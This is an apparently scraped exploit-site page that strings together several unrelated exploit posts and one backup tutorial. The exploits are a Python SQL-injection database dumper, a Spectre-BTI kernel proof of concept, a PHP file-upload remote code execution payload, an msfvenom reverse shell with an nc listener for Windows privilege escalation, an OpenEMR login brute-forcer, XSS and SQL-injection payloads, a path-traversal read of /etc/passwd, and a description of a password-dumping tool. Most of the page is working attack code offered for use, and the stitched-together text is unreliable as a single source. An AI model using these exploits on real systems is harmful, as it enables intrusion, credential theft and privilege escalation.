NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: x.add_row([i]) except: pass print(x) def ListDatabases(url): header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} x = PrettyTable() x.field_names = ["DATABASES"] payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: x.add_row([i]) except: pass print(x) def Main(): Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__) Menu.add_option('-u', '--url', type="str", dest="url", help='target url') Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases') Menu.add_option('-D', '--db', type="str", dest="database", help='select a database') Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables') Menu.add_option('-T', '--table', type="str", dest="table", help='select a table') Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content') (options, args) = Menu.parse_args() Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump """) Menu.add_option_group(Examples) if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}: Menu.print_help() print('') print(' %s' % __description__) print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC) print(' Any malicious or illegal activity may be punishable by law') print(' Use at your own risk') elif len(args) == 0: try: if options.url != None: if options.l_databases != None: ListDatabases(options.url) if options.database != None: if options.l_tables != None: ListTables(options.url, options.database) if options.table != None: if options.dump != None: DumpTable(options.url, options.database, options.table) except: print("Unexpected error") if __name__ == '__main__': try: Main() except KeyboardInterrupt: print() print(infos.PROCESS + "Exiting...") print() exit(1)
HireHackking

Linux Kernel 6.2 - Userspace Processes To Enable Mitigation

HACKER · %s · %s

## Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation ## Exploit Author: nu11secur1ty ## CVE ID: CVE-2023-1998 ## Description ## Summary The Linux kernel allows userspace processes to enable mitigations by calling prctl with [PR_SET_SPECULATION_CTRL](https://docs.kernel.org/userspace-api/spec_ctrl.html) which disables the speculation feature as well as by using seccomp. We had noticed that on VMs of at least one major cloud provider, the kernel still left the victim process exposed to attacks in some cases even after enabling the spectre-BTI mitigation with prctl. The same beahaviour can be observed on a bare-metal machine when forcing the mitigation to IBRS on boot comand line. This happened because when plain IBRS was enabled (not enhanced IBRS), the kernel had some logic that determined that [STIBP](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/single-thread-indirect-branch-predictors.html) was not needed. The IBRS bit implicitly protects against cross-thread branch target injection. However, with legacy [IBRS](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html), the IBRS bit was cleared on returning to userspace, due to performance reasons, which disabled the implicit STIBP and left userspace threads vulnerable to cross-thread branch target injection against which STIBP protects. ## Severity Medium - The kernel failed to protect applications that attempted to protect against Spectre v2 leaving them open to attack from other processes running on the same physical core in another hyperthread. ## Vulnerable code The Bug present on Kernel 6.2 (https://elixir.bootlin.com/linux/v6.2/source/arch/x86/kernel/cpu/bugs.c#L1196) implements an optimization that disables STIBP if the mitgation is IBRS or eIBRS. However IBRS doesn't mitigate SMT attacks on userspace as eIBRS does. Setting spectre_v2=ibrs on kernel boot parameters for bare metal machines without eIBRS support also triggers the bug. ```c /* * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible, * STIBP is not required. */ if (!boot_cpu_has(X86_FEATURE_STIBP) || !smt_possible || spectre_v2_in_ibrs_mode(spectre_v2_enabled)) return; ``` ## Proof of Concept The test consists of two processes. The attacker constantly poisons an indirect call to speculatively redirect it to a target address. The victim process measures the mispredict rate and tries to mitigate the attack either by calling PRCTL or writing to the MSR directly using a kernel module that exposes MSR read and write operations to userspace. ```c /* gcc -o victim test.c -O0 -masm=intel -w -DVICTIM gcc -o victim-PRCTL test.c -O0 -masm=intel -w -DVICTIM -DPRCTL gcc -o victim-nospecctrl test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=0 gcc -o victim-IBRS test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=1 gcc -o victim-STIBP test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=2 gcc -o victim-IBPB test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=0 -DIBPB gcc -o attacker test.c -O0 -masm=intel -w */ #include "utils.h" #include <stdio.h> #include <string.h> #include <sys/prctl.h> #ifndef PRINT_AMMOUNT #define PRINT_AMMOUNT 1000 #endif #define IA32_SPEC_CTRL 72 uint8_t *rdiPtr; uint8_t unused[0x500]; uint8_t probeArray[0x1000] = {2}; uint8_t unuse2[0x500]; uint32_t f1() {} int poison(uint8_t *srcAddress, uint8_t *dstAddress, uint64_t cpu) { volatile uint8_t d; unsigned tries = 0; unsigned hits = 0; unsigned totalHits = 0; unsigned totalTries = 0; jitForLoop(srcAddress); while (1) { #ifndef VICTIM callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray); continue; #else #ifdef IBPB wrmsr_on_cpu(73, cpu, 1); #endif for (int i = 0; i < 100; i++) { d = *dstAddress; flush((uint8_t *)&rdiPtr); callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray); } if (probe(&probeArray[0]) < THRESHOLD) { hits++; totalHits++; } totalTries++; if (++tries % PRINT_AMMOUNT == 0) { printf("Rate: %u/%u MSR[72]=%d\n", hits, tries,rdmsr_on_cpu(IA32_SPEC_CTRL,cpu)); #ifdef MSR wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL); #endif tries = 0; hits = 0; if (totalTries >= PRINT_AMMOUNT * 10) { break; } } usleep(1); #endif } printf("Total mispredict rate: %d/%d (%.2f %)\n", totalHits, totalTries, (float)totalHits * 100 / (float)totalTries); } int main(int argc, char **argv) { uint64_t srcAddress; uint64_t dstAddress; uint64_t cpu; if (argc < 4) { printf("Usage: %s <srcAddress> <dstAddress> <cpuCore> \n", argv[0]); printf("Example: %s 0x55555554123 0x55555555345 1 \n", argv[0]); return 0; } srcAddress = (uint64_t)strtoull(argv[1], NULL, 16); dstAddress = (uint64_t)strtoull(argv[2], NULL, 16); cpu = (uint64_t)strtoull(argv[3], NULL, 16); SetCoreAffinity(cpu); uint8_t *rwx1 = requestMem((uint8_t *)(srcAddress & (~0xfffULL)), 0x1000); uint8_t *rwx2 = requestMem((uint8_t *)(dstAddress & (~0xfffULL)), 0x1000); #ifdef PRCTL if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, 0, 0) != 0) { perror("prctl"); } printf("PRCTL GET value 0x%x\n", prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, 0, 0, 0)); #endif #ifdef MSR printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu); wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL); printf("writing msr[%d]=%d on core %d \n", IA32_SPEC_CTRL, MSR_VAL, cpu); printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu); #endif // set up leak gadget into position #ifdef VICTIM rdiPtr = (uint8_t *)f1; copyLeakGadget(dstAddress); #else rdiPtr = (uint8_t *)dstAddress; copyRetGadget(dstAddress); #endif poison(srcAddress, dstAddress, cpu); #ifdef MSR printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu); #endif } ``` Timeline **Date reported** to Cloud providers: 31/12/2022 **Date reported** to security@kernel.org: 20/02/2022 **Date fixed:** 10/03/2023 - [torvalds/linux@6921ed9](https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d) - https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d Date disclosed: 12/04/2023 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking
Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE) Application: ProjeQtOr Project Management System Version: 10.3.2 Bugs: Remote Code Execution (RCE) (Authenticated) via file upload Technology: PHP Vendor URL: https://www.projeqtor.org Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download Date of found: 19.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Possible including php file with phar extension while uploading image. Rce is triggered when we visit again Payload:<?php echo system("id"); ?> poc request: POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1 Host: localhost Content-Length: 1177 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: application/json Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/projeqtor/view/main.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic Connection: close ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar" Content-Type: application/octet-stream <?php echo system("id"); ?> ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentId" ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentRefType" User ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentRefId" 1 ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentType" file ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="MAX_FILE_SIZE" 10485760 ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentLink" ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentDescription" ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentPrivacy" 1 ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="uploadType" html5 ------WebKitFormBoundaryY0bpJaQzcvQberWR-- visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar
HireHackking

OCS Inventory NG 2.3.0.0 - Unquoted Service Path

HACKER · %s · %s

##################################################################### # # # Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path # # Date: 2023/04/21 # # Exploit Author: msd0pe # # Vendor Homepage: https://oscinventory-ng.org # # Software Link: https://github.com/OCSInventory-NG/WindowsAgent # # My Github: https://github.com/msd0pe-1 # # Fixed in version 2.3.1.0 # # # ##################################################################### OCS Inventory NG Windows Agent: Versions below 2.3.1.0 contains an unquoted service path which allows attackers to escalate privileges to the system level. [1] Find the unquoted service path: > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ OCS Inventory Service OCS Inventory Service C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe Auto [2] Get informations about the service: > sc qc "OCS Inventory Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OCS Inventory Service TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OCS Inventory Service DEPENDENCIES : RpcSs : EventLog : Winmgmt : Tcpip SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe [4] Upload the revese shell to C:\Program Files (x86)\OCS.exe > put OCS.exe > ls drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 . drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 .. drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Common Files -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET drw-rw-rw- 0 Sat Apr 22 04:51:20 2023 OCS Inventory Agent -rw-rw-rw- 7168 Sat Apr 22 05:20:38 2023 OCS.exe drw-rw-rw- 0 Sat Apr 22 03:24:58 2023 Windows Defender drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Mail drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop "OCS Inventory Service" > sc start "OCS Inventory Service" OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
HireHackking

Title: Qiniu Cloud Automatic Backup Script

HACKER · %s · %s

I have previously mentioned how to automatically backup FTP and databases on Linux VPS daily, but you need to build your own FTP space, which is a bit troublesome than this tutorial. If you don’t have FTP space, you can apply for a Qiniu Cloud Storage. Free 10G space backup is enough for ordinary small sites. Here is a script to backup website files and databases to Qiniu. The actual test results are pretty good. You can automatically backup them every day by setting up a scheduled task under Linux vps. The Github project address of this script: https://github.com/ccbikai/backuptoqiniu
First register a Qiniu Cloud account, and then after real-name authentication, you will get 10G of traffic and space. After registering, find the object storage at the left position, then create a new storage space, and remember the name of the newly created storage space, which you need to use later.
Method
Note: The system python version must be above 2.7
1. Install zip
apt-get install zip Note: the centos command is
yum install zip
2. Install the backup script
wget --no-check-certificate -O backuptoqiniu.zip https://www.moerats.com/usr/down/backuptoqiniu.zip
unzip backuptoqiniu.zip cd backuptoqiniu
python setup.py install
3. Edit configuration file
Use vi backuptoqiniu.sh command or Winscp tool to edit
##Backup Configuration Information ##

#Backup name, used to mark
BACKUP_NAME='backup'
#Backup directory, please separate multiple spaces
BACKUP_SRC='/home/wwwroot/moerats.com'
#Mysql host address
MYSQL_SERVER='localhost'
#Mysql username
MYSQL_USER='root'
#Mysql Password
MYSQL_PASS='mysqlpassword'
#Mysql backup database, please separate multiple spaces
MYSQL_DBS='dbname'
#Replace the file temporarily in the directory, generally no changes are required
BACKUP_DIR='/tmp/backuptoqiniu'
#Back up file compression password to ensure the security of the compressed package
BACKUP_FILE_PASSWD='123456'

##Backup Configuration Information End ##

##Qi Niu Configuration Information ##

#Storage space corresponds to the folder we created on Qiniu
QINIU_BUCKET='Rats'
QINIU_ACCESS_KEY='ACCESS_KEY'
QINIU_SECRET_KEY='SECRET_KEY'

##Qi Niu Configuration Information End ##The script configuration above has basically been written very clearly. The first half of the website is filled in, and the last three lines of information are obtained in Qi Niu. QINIU_BUCKET is the storage space name, ACCESS_KEY and SECRET_KEY are obtained in the personal panel-key management. The long list of AK and SK that corresponds to is the key.
4. Test script
chmod +x backuptoqiniu.sh
After ./backuptoqiniu.sh is running normally, we can go to the Qiniu background to check if there is any compressed package in the newly created storage space.
5. Set up automatic running scripts
crontab -e
0 2 * * 0 /bin//root/backuptoqiniu/backuptoqiniu.sh #Add this script The above script means to use crontab timed tasks to automatically run this script at 2 a.m. every day. For specific usage of crontab, please refer to the file. Detailed explanation of the commands for the installation of Crontab of Linux system and timing tasks
Note: Many times our VPS needs to use the timing function when running scripts or restarting certain software. At this time, we need to use the Crontab timing software.
Note: If you are using foreign vps, you may also need to set it to domestic time by CP /usr/share/zoneinfo/Asia/Shanghai /etc/localtime.
Then service cron restart starts your scheduled task.
The effect is as follows

You can view the backup files in Qiniu Cloud
HireHackking

OpenEMR v7.0.1 - Authentication credentials brute force

HACKER · %s · %s

# Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force # Date: 2023-04-28 # Exploit Author: abhhi (Abhishek Birdawade) # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz # Version: 7.0.1 # Tested on: Windows ''' Example Usage: - python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt ''' import requests import sys import argparse, textwrap from pwn import * #Expected Arguments parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt''')) parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") parser.add_argument("-u","--username", help="Username to Bruteforce for.") parser.add_argument("-ul","--userlist", help="Username Dictionary") parser.add_argument("-p","--passlist", help="Password Dictionary") args = parser.parse_args() if len(sys.argv) < 2: print (f"Exploit Usage: python3 exploitBF.py -h") sys.exit(1) # Variable LoginPage = args.url Username = args.username Username_list = args.userlist Password_list = args.passlist log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ') def login(Username,Password): session = requests.session() r = session.get(LoginPage) # Progress Check process = log.progress('Brute Force') #Specifying Headers Value headerscontent = { 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Referer' : f"{LoginPage}", 'Origin' : f"{LoginPage}", } #POST REQ data postreqcontent = { 'new_login_session_management' : 1, 'languageChoice' : 1, 'authUser' : f"{Username}", 'clearPass' : f"{Password}" } #Sending POST REQ r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False) #Printing Username:Password process.status('Testing -> {U}:{P}'.format(U = Username, P = Password)) #Conditional loops if 'Location' in r.headers: if "/interface/main/tabs/main.php" in r.headers['Location']: print() log.info(f'SUCCESS !!') log.success(f"Use Credential -> {Username}:{Password}") sys.exit(0) #Reading User.txt & Pass.txt files if Username_list: userfile = open(Username_list).readlines() for Username in userfile: Username = Username.strip() passfile = open(Password_list).readlines() for Password in passfile: Password = Password.strip() login(Username,Password)
HireHackking

PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS) # Date: 2023-04-29 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.phpjabbers.com/faq.php # Software Link: https://www.phpjabbers.com/simple-cms/ # Version: 5.0 # Tested on: Kali Linux ### Steps to Reproduce ### - Please login from this address: https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin - Click on the "Add Section" button. - Then enter the payload ("><img src=x onerror=alert("Stored")>) in the "Section" box and save it. - Boom! An alert message saying "Stored" will appear in front of you. ### PoC Request ### POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate HTTP/1.1 Host: localhost Cookie: pj_sid=PJ1.0.6199026527.1682777172; pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1; PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1; pjd=7l9bb4ubmknrdbns46j7g5cqn7 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 371 Origin: https://localhost Referer: https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T
HireHackking

PHPJabbers Simple CMS 5.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection # Date: 2023-04-29 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.phpjabbers.com/faq.php # Software Link: https://www.phpjabbers.com/simple-cms/ # Version: 5.0 # Tested on: Kali Linux ### Request ### GET /simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 HTTP/1.1 Accept: */* x-requested-with: XMLHttpRequest Referer: https://localhost/simplecms/preview.php?lid=1 Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844; _fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292; pjd_simplecms=1; last_position=%2F Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive ### Parameter & Payloads ### Parameter: column (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869) THEN 2 ELSE (SELECT 2339 UNION SELECT 4063) END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: action=pjActionGetFile&column=2 AND EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT (ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10
HireHackking

Bang Resto v1.0 - 'Multiple' SQL Injection

HACKER · %s · %s

# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection # Date: 2023-04-02 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html # Software Link: https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip # Version: 1.0 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-29849 *Affected Parameters:* btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[], itemqty[], btnMenuItemID *Steps to Reproduce:* 1. First login your staff panel. 2. then go to "order" menu and Select menu then create order and intercept request data using burp suite. so your request data will be: POST /bangresto/staff/displayitem.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 194 Origin: http://127.0.0.1 Referer: http://127.0.0.1/bangresto/staff/order.php Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5 Connection: close btnMenuItemID=1&qty=1 3. "btnMenuItemID" parameter is vulnerable. Let's try to inject union based SQL Injection use this query ".1 union select 1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())-- -" in "btnMenuItemID" parameter. 4. Check browser you will see user, database and version informations. 5. You could also use sqlmap to dump the whole database by saving the web request from BurpSuite
HireHackking

Title: Password crawler under Linux

HACKER · %s · %s

Mimipenguin beta-2.0
A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.
alt text
Details
This version of Mimipenguin sacrifices features and coverage (as opposed to the beta-1.0 py and sh scripts) in favor of speed and efficiency. Beta 2.0 uses hardcoded offsets for known structures in memory along with PTRACE to reliably extract cleartext user passwords from linux desktop environments.
Project address : link
HireHackking

GDidees CMS 3.9.1 - Local File Disclosure

HACKER · %s · %s

# Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure # Date : 03/27/2023 # Exploit Author : Hadi Mene # Vendor Homepage : https://www.gdidees.eu/ # Software Link : https://www.gdidees.eu/cms-1-0.html # Version : 3.9.1 and earlier # Tested on : Debian 11 # CVE : CVE-2023-27179 ### Summary: GDidees CMS v3.9.1 and lower versions was discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php. ### Description : Imgdownload.php is mainly used by the QR code generation module to download an QR code. The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized. Furthermore, there is no admin session check in this code as it should since only the admin user should normally be able to download QR code. Vulnerable Code : 3. if (isset($_GET["filename"])) { 4. $filename=$_GET["filename"]; ..... ..... 27. @readfile($filename) OR die(); ### POC : URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd Exploitation using curl # curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin ntp:x:104:110::/nonexistent:/usr/sbin/nologin messagebus:x:105:111::/nonexistent:/usr/sbin/nologin uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin vboxadd:x:998:1::/var/run/vboxadd:/bin/false 